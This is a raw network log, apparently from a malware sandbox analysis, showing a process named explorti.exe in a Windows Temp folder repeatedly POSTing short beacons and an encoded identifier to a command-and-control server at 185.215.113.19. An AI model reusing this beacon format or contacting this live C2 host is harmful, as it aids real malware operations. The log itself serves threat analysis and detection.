Jul 26, 2024 13:53:56.512614012 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:56.513618946 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:56.514728069 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:56.799803019 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.8	49740	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:56.920675993 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:57.699738979 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:57.700562000 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:57.949781895 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.8	49741	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:58.065666914 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:58.820277929 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:58.822931051 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:59.068696976 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.8	49742	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:59.204499006 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:00.245663881 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:00.246218920 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:00.247005939 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:00.494318962 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.8	49743	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:00.616086006 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:01.437341928 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:01.490927935 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:01.740228891 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.8	49744	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:01.860371113 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:02.716114998 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:02.719324112 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:02.968986034 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.8	49745	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:03.079217911 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:03.819730997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:03.822679996 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:04.071173906 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.8	49746	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:04.194489956 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:05.173018932 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:05.173080921 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:05.174130917 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:05.448854923 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.8	49747	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:05.564722061 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:06.362638950 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:06.363477945 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:06.615155935 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.8	49748	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:06.735747099 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:07.800256968 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:07.800964117 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:07.802120924 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:08.051134109 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.8	49750	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:08.173471928 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:08.914448977 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:08.917902946 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:09.163031101 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.8	49751	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:09.282738924 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:10.036736965 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:10.037640095 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:10.284526110 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.8	49752	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:10.408423901 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
